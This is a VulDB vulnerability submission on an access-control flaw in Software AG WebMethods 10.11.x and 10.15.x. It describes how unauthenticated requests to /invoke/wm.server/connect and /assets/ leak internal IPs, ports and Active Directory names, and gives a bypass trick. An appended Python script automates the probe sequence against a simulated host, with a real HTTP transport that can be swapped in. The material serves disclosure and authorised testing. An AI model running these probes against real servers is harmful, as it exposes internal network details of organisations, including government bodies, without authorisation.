Submission #242026: Software AG Web Methods 10.11.x, 10.15.x Inconsistent Access Control

Information

Title: Software AG Web Methods 10.11.x, 10.15.x Inconsistent Access Control

Description: An issue in SoftwareAG WebMethods v.10.11.x and v.10.15.x allows a remote attacker to obtain sensitive information via the wm.server/connect/ or /assets/ files. Sometimes, to access such a file like /assets/, a popup may ask you to provide the username and password; just click CANCEL and you'll be redirected to the directory. In the top left corner you'll find the FQDN for the application server in ACTIVE DIRECTORY. If you visit /invoke/wm.server/connect, you'll be able to see all listed data from internal IPs, ports, versions. In some cases, I've noticed that it refuses the connection to the /assets/ directory, for example, but if we enter /assets/x as a false value, then come back to /assets/, we will be able to see the folder content. I think it's due to insufficient access control where the referrer header may be trusted. * There are governmental entities vulnerable to this vulnerability; their internal IPs, ports, and Active Directory FQDN are exposed to the public due to this bug.
User: mohammedhashayka (UID 58817)
Submitted: 22/11/2023 07:35 AM (3 years ago)
Moderation: 07/12/2023 01:51 PM (15 days later)
Status: Approved
VulDB entry: 247158 [Software AG WebMethods 10.11.x/10.15.x wm.server/connect/ privilege escalation]
Points: 17
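The following is an added example, not part of the VulDB submission, the reporter's post, or Software AG's code. It turns the probe sequence described above (request /assets/, request the bogus /assets/x, then return to /assets/ with a Referer set, plus a plain request to /invoke/wm.server/connect) into a small checker with a pluggable transport. The SimulatedHost class is a constructed stand-in that models only what the report claims (401 on /assets/ at first, 200 after the /assets/x trick when the Referer comes from the same host), so the script runs offline; its status codes, the Referer condition, the hostname, and the sample IP/port/version strings are assumptions and constructed data, not verified product behaviour. The urllib_transport function is for use only against a host you are authorised to test.

```python
"""Checker for the inconsistent access-control behaviour described in the
submission.  Added example; the simulated server models the *reported*
behaviour and is an assumption, not confirmed WebMethods behaviour."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin
import urllib.error
import urllib.request

# A transport takes (url, headers) and returns (status, body).
Transport = Callable[[str, Dict[str, str]], Tuple[int, str]]

# Paths named in the report; the checker requests each without credentials.
PROBE_PATHS = ("/invoke/wm.server/connect", "/assets/")


def urllib_transport(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real HTTP transport (only for hosts you are authorised to test)."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 401/403 responses still carry a status
        return e.code, e.read().decode("utf-8", "replace")


@dataclass
class SimulatedHost:
    """Constructed stand-in modelling the report: /assets/ answers 401 until
    /assets/x has been requested, after which a request whose Referer points
    at the same host is served.  The Referer condition is the reporter's
    theory, assumed here so the check has something to run against."""
    base: str = "http://webmethods.example"   # hypothetical host
    primed: bool = False
    listing: str = "Index of /assets/\nserver: node1.corp.example\n"  # constructed

    def __call__(self, url: str, headers: Dict[str, str]) -> Tuple[int, str]:
        path = url[len(self.base):]
        if path == "/invoke/wm.server/connect":
            # Constructed sample of the kind of data the report says is listed.
            return 200, "host=10.0.0.12 port=5555 version=10.15"
        if path == "/assets/x":
            self.primed = True          # the bogus child request "unlocks" the listing
            return 404, "Not Found"
        if path == "/assets/":
            ref = headers.get("Referer", "")
            if self.primed and ref.startswith(self.base):
                return 200, self.listing
            return 401, "Unauthorized"
        return 404, "Not Found"


def probe(base: str, transport: Transport) -> Dict[str, int]:
    """Run the sequence from the report; return the HTTP status per step."""
    results: Dict[str, int] = {}
    for p in PROBE_PATHS:
        results[f"GET {p}"], _ = transport(urljoin(base, p), {})
    # The reporter's trick: request a bogus child, then revisit /assets/.
    transport(urljoin(base, "/assets/x"), {})
    results["GET /assets/ after /assets/x (Referer set)"], _ = transport(
        urljoin(base, "/assets/"), {"Referer": urljoin(base, "/assets/x")})
    return results


def exposed_without_auth(results: Dict[str, int]) -> List[str]:
    """Steps that returned 200, i.e. content served with no credentials."""
    return [step for step, status in results.items() if status == 200]


if __name__ == "__main__":
    host = SimulatedHost()
    outcome = probe(host.base, host)
    for step, status in outcome.items():
        print(f"{status}  {step}")
    print("unauthenticated access at:", exposed_without_auth(outcome))
```

Swap SimulatedHost for urllib_transport to run the same sequence against a real target; a 200 on the third step where the first gave 401 is the inconsistency the report describes, and a 200 on the first step alone means the Referer theory is irrelevant for that host.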
